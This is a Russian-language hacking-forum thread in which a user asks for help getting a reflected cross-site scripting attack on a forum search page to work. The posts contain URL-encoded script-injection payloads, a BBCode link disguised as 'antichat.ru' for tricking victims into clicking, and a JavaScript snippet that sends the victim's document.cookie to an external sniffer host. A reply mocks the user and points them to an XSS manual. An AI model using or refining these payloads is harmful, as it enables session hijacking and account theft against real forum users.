В общем вот что в итоге получается (сколько я не клацкал)) на интер) Code: http://localhost/1.php?a=search=%22%3E%3Cscript%20src=http://САЙТ.ru/js.js%3E%3C/script%3E Получившуюся ссылку засовую в сообщение и отсылаю: (вот эту ссылку) PHP: [url=http://SITE.ru/forum/ssearch.php?q=%22%3E%3Cscript%20src=http://xxx.ru/js.js%3E%3C/script%3E]antichat.ru[/url] Может переадресацию нужно сделать какнить на мой js.js Если на неё нажать,,,попадаю сюда: PHP: http://site.ru/forum/ssearch.php?q=%22%3E%3Cscript%20src=http://xxx.ru/js.js%3E%3C/script%3E ------------------------------------------------------------------------ Снифер пустой,,,,может из за кода js.js Я в нём вот что пишу,,,но помойму не работает он вовсе)): HTML: <script>img = new Image(); img.src = "http://s.netsec.ru/login.gif?"+document.cookie;</script>
Может вот так сделать: HTML: http://localhost/1.php?a=search="><script language="JavaScript">document.location.href=http://ххх.ru/js.js></script> ---------------------------------------------------------------------- не перенаправляет так...
Мб если ты не можешь простейшего(утащить куки) не стоит в это ввязыватся?(советую перечитать мануал по xss)
